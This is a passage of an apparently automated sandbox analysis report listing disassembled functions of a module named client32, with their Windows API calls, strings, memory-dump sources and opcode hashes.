                                                                                                                                                    Function 1108F720 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                                                                      • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                                      • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 1108F7BC
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 1108F7D1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                                                    • String ID: L
                                                                                                                                                    • API String ID: 1338273076-2909332022
                                                                                                                                                    • Opcode ID: 95ac659df3cb43b7a394a31561a0db95ca543259b56f7bb8d276c069331ce165
                                                                                                                                                    • Instruction ID: 369f405687447c84649efdd58832c02068d177a3a0274ca2d5cff2ffa4839110
                                                                                                                                                    • Opcode Fuzzy Hash: 95ac659df3cb43b7a394a31561a0db95ca543259b56f7bb8d276c069331ce165
                                                                                                                                                    • Instruction Fuzzy Hash: 9F3160B5D04259AEEB11DFA4C840BDEFBF8FB08314F14426EE915A7280D775A904CBA1
                                                                                                                                                    Function 110AD1B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 110AD1E3
                                                                                                                                                      • Part of subcall function 110ACEB0: LoadLibraryA.KERNEL32(Winscard.dll,00000000,00000000,110AD1F3,00000000,00000001,00000000,?,11185738,000000FF,?,110ADC42,?,?,00000200,?), ref: 110ACEC4
                                                                                                                                                      • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(00000000,SCardEstablishContext), ref: 110ACEE1
                                                                                                                                                      • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardReleaseContext), ref: 110ACEEE
                                                                                                                                                      • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardIsValidContext), ref: 110ACEFC
                                                                                                                                                      • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardListReadersA), ref: 110ACF0A
                                                                                                                                                      • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetStatusChangeA), ref: 110ACF18
                                                                                                                                                      • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardCancel), ref: 110ACF26
                                                                                                                                                      • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardFreeMemory), ref: 110ACF34
                                                                                                                                                      • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardConnectA), ref: 110ACF42
                                                                                                                                                      • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardDisconnect), ref: 110ACF50
                                                                                                                                                      • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetAttrib), ref: 110ACF5E
                                                                                                                                                      • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardControl), ref: 110ACF6C
                                                                                                                                                      • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardListCardsA), ref: 110ACF7A
                                                                                                                                                      • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetCardTypeProviderNameA), ref: 110ACF88
                                                                                                                                                      • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardBeginTransaction), ref: 110ACF96
                                                                                                                                                      • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardEndTransaction), ref: 110ACFA4
                                                                                                                                                      • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardReconnect), ref: 110ACFB2
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?,?), ref: 110AD252
                                                                                                                                                    Strings
                                                                                                                                                    • winscard.dll is NOT valid!!!, xrefs: 110AD1FD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$Library$FreeLoad_memset
                                                                                                                                                    • String ID: winscard.dll is NOT valid!!!
                                                                                                                                                    • API String ID: 212038770-1939809930
                                                                                                                                                    • Opcode ID: 2490663d4c0d4ec01f8a7efd0df3ebe9692d3296733f7b5ae7fba3cdb2ac2a80
                                                                                                                                                    • Instruction ID: 57730f506c13caa9e6db9d6f73070caca170ae8d01d94efb838e03e2302413b1
                                                                                                                                                    • Opcode Fuzzy Hash: 2490663d4c0d4ec01f8a7efd0df3ebe9692d3296733f7b5ae7fba3cdb2ac2a80
                                                                                                                                                    • Instruction Fuzzy Hash: 6521B3B6D40629ABDB10CF95DC44EEFFBB8EB45660F00861AFC15A3340D631A904CBE0
                                                                                                                                                    Function 1100F2A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 1100F2BB
                                                                                                                                                      • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                                                                                      • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                                                                                      • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 1100F2D2
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                                                                    • String ID: string too long
                                                                                                                                                    • API String ID: 963545896-2556327735
                                                                                                                                                    • Opcode ID: 75f838df1ffa959431b4a62d365d349d8fd4399dcfd8cc9140359aaa01b8e6d6
                                                                                                                                                    • Instruction ID: 9c03118c2fef7a30d7f16138fb3dcb5344bdbe7bcaefeaa8633fdbb4ef9eb1a5
                                                                                                                                                    • Opcode Fuzzy Hash: 75f838df1ffa959431b4a62d365d349d8fd4399dcfd8cc9140359aaa01b8e6d6
                                                                                                                                                    • Instruction Fuzzy Hash: E711E9737006148FF321D95DA880BAAF7EDEF957B4F60065FE591CB640C7A1A80083A1
                                                                                                                                                    Function 110232A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItemTextA.USER32(?,?,?,00000100), ref: 110232D7
                                                                                                                                                    • SetDlgItemTextA.USER32(?,?,?), ref: 1102335F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ItemText
                                                                                                                                                    • String ID: ...
                                                                                                                                                    • API String ID: 3367045223-440645147
                                                                                                                                                    • Opcode ID: 3c7fd1be2824b6022330b2e6fcbe42859dc36aafcf172dfa7595ecaab8fe21c6
                                                                                                                                                    • Instruction ID: 288fafb08c6b2ba60c27d59f26b93e6fc9d809d534a4309207b318a271e26125
                                                                                                                                                    • Opcode Fuzzy Hash: 3c7fd1be2824b6022330b2e6fcbe42859dc36aafcf172dfa7595ecaab8fe21c6
                                                                                                                                                    • Instruction Fuzzy Hash: 1121A2756046199BCB24CF68C880FEAF7F9AF99304F1081D9E58997240DAB0AD85CF90
                                                                                                                                                    Function 110B9730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ShowWindow.USER32(8D111949,00000009,?,?,?,?,?,?,?,?,?,?,110BA876,110C032C), ref: 110B977B
                                                                                                                                                      • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004C), ref: 110B8AF2
                                                                                                                                                      • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004D), ref: 110B8AF9
                                                                                                                                                      • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004E), ref: 110B8B00
                                                                                                                                                      • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004F), ref: 110B8B07
                                                                                                                                                      • Part of subcall function 110B8AC0: SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B8B16
                                                                                                                                                      • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(?), ref: 110B8B24
                                                                                                                                                      • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(00000001), ref: 110B8B33
                                                                                                                                                    • MoveWindow.USER32(8D111949,?,?,?,?,00000001), ref: 110B97A3
                                                                                                                                                    Strings
                                                                                                                                                    • j CB::OnRemoteSizeRestore(%d, %d, %d, %d), xrefs: 110B97BD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: System$Metrics$Window$InfoMoveParametersShow
                                                                                                                                                    • String ID: j CB::OnRemoteSizeRestore(%d, %d, %d, %d)
                                                                                                                                                    • API String ID: 2940908497-693965840
                                                                                                                                                    • Opcode ID: 60bc414364147a50c916ce8f7c8964549782f9578ddb51fb58b5c7b9b217b13c
                                                                                                                                                    • Instruction ID: 55e82b17da46594b085dc316db9a602337c46ecd43c839d0c1f018f75bd6c70b
                                                                                                                                                    • Opcode Fuzzy Hash: 60bc414364147a50c916ce8f7c8964549782f9578ddb51fb58b5c7b9b217b13c
                                                                                                                                                    • Instruction Fuzzy Hash: DA21E875B0060AAFDB08DFA8C995DBEF7B5FB88304F104268E519A7354DB30AD41CBA4
                                                                                                                                                    Function 11145990 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(000000FF,?,00000104,000000FF), ref: 111459B7
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 111459F6
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EnvironmentExpandFileModuleNameStrings
                                                                                                                                                    • String ID: :
                                                                                                                                                    • API String ID: 2034136378-336475711
                                                                                                                                                    • Opcode ID: 1879a18607367a7fe0ec9fcc5ca715ca320c192212d283e296261fc87c6dfa09
                                                                                                                                                    • Instruction ID: 2f025fe159ad018ca32f107a988c6b97e10c7b7f69d8ea9c63f353a653f43b24
                                                                                                                                                    • Opcode Fuzzy Hash: 1879a18607367a7fe0ec9fcc5ca715ca320c192212d283e296261fc87c6dfa09
                                                                                                                                                    • Instruction Fuzzy Hash: 65213738C043599FDB21CF64CC44FD9BB68AF16708F6041D4D59967942EF706A8DCBA1
                                                                                                                                                    Function 11043760 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 11043784
                                                                                                                                                    • GetClassNameA.USER32(?,?,00000040), ref: 11043799
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassNameProcessThreadWindow
                                                                                                                                                    • String ID: tooltips_class32
                                                                                                                                                    • API String ID: 2910564809-1918224756
                                                                                                                                                    • Opcode ID: 6d3c4fdc3a6f6e7596f8af0fff3375ada305fabf060d9fd927d6679c10a610bf
                                                                                                                                                    • Instruction ID: 7b66b5eeeba6873e3bd91d5637fb3b576f23a09c5117b8e426f31f0334ec312d
                                                                                                                                                    • Opcode Fuzzy Hash: 6d3c4fdc3a6f6e7596f8af0fff3375ada305fabf060d9fd927d6679c10a610bf
                                                                                                                                                    • Instruction Fuzzy Hash: DF112B71A080599BD711DF74C880AEDFBB9FF55224F6051E9DC819FA40EB71A906C790
                                                                                                                                                    Function 110391C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                                                                                      • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                                                                                      • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                                                                                      • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                                                                                      • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                                                                                      • Part of subcall function 110CB9E0: GetDlgItemTextA.USER32(?,?,?,00000400), ref: 110CBA0C
                                                                                                                                                      • Part of subcall function 110CB9E0: SetDlgItemTextA.USER32(?,?,00000000), ref: 110CBA30
                                                                                                                                                    • SetDlgItemTextA.USER32(?,000004BC,?), ref: 11039202
                                                                                                                                                    • _memset.LIBCMT ref: 11039216
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ItemText$Window$ObjectRectShow_memset
                                                                                                                                                    • String ID: 358075
                                                                                                                                                    • API String ID: 3037201586-2376970911
                                                                                                                                                    • Opcode ID: 2bc1dfb5218c02c431ab83e71b2dcb76f085101561c9e5be1cea2ac4dddf3c12
                                                                                                                                                    • Instruction ID: 4133adfa845279c2267cfda8ab6a139ff56e83a68c49f32f67e71b8829282469
                                                                                                                                                    • Opcode Fuzzy Hash: 2bc1dfb5218c02c431ab83e71b2dcb76f085101561c9e5be1cea2ac4dddf3c12
                                                                                                                                                    • Instruction Fuzzy Hash: E5119675740614AFE720DB68CC81FDAB7E8EF48704F004588F6089B280DBB1FA41CB95
                                                                                                                                                    Function 110ED5D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegQueryValueExA.ADVAPI32(00020019,?,00000000,1EF76653,00000000,00020019,?,00000000), ref: 110ED600
                                                                                                                                                      • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
